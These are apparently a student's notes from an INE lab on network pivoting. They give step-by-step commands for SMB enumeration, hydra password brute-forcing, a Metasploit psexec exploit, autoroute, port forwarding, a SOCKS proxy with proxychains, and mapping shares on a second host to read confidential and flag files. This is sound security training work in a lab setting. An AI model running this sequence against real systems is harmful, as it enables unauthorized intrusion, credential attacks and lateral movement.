Pivoting
Pivoting w/ INE
ping demo.ine.local # reachable from this machine
ping demo1.ine.local # not reachable from this machine
nmap demo.ine.local
# SMB ports are open. Enumeration and Exploitation of SMB
nmap -sV -p 139,445 demo.ine.local
nmap -p 445 --script smb-protocols [IP] # reports the supported SMB protocol versions
nmap -p 445 --script smb-security-mode [IP] # checks the security modes
nmap -p 445 --script smb-enum-users [IP] # enumerates user accounts on the system
# create a user list with the found usernames
nano users.txt
# bruteforce
hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
# w/ Metasploit
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser administrator
set SMBPass password1
exploit
# after getting a meterpreter session
getuid
sysinfo
# gather the IP address of demo1.ine.local
shell
ping [demo1.ine.local-IP]
Ctrl + C # to terminate the channel
metasploit > run autoroute -s [demo1.ine.local-IP]/20
background
# exploitation - scan
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit
# exploitation - port forwarding
sessions -i 1
portfwd add -l 1234 -p 80 -r demo2.ine.local
portfwd list
# set PAYLOAD windows/meterpreter/bind_tcp
# check the proxychains config to find the configured socks4 port
cat /etc/proxychains4.conf
# start the SOCKS proxy
background # backgrounds the meterpreter session
use auxiliary/server/socks_proxy
show options
set SRVPORT 9050
set VERSION 4a
exploit
jobs
proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
sessions -i 1
shell
net view [demo1.ine.local-IP] # access denied
Ctrl + C # to terminate the channel
migrate -N explorer.exe
shell
net view [demo1.ine.local-IP]
net use D: \\10.0.22.69\Documents
net use K: \\10.0.22.69\K$
dir D:
dir K:
Ctrl + C # to terminate the channel
cat D:\\Confidential.txt
cat D:\\FLAG2.txt